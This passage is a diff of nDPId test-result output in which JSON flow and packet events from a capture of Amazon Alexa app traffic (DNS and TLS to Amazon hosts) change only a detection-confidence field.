+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00190{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976043617} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976043612,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} 
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 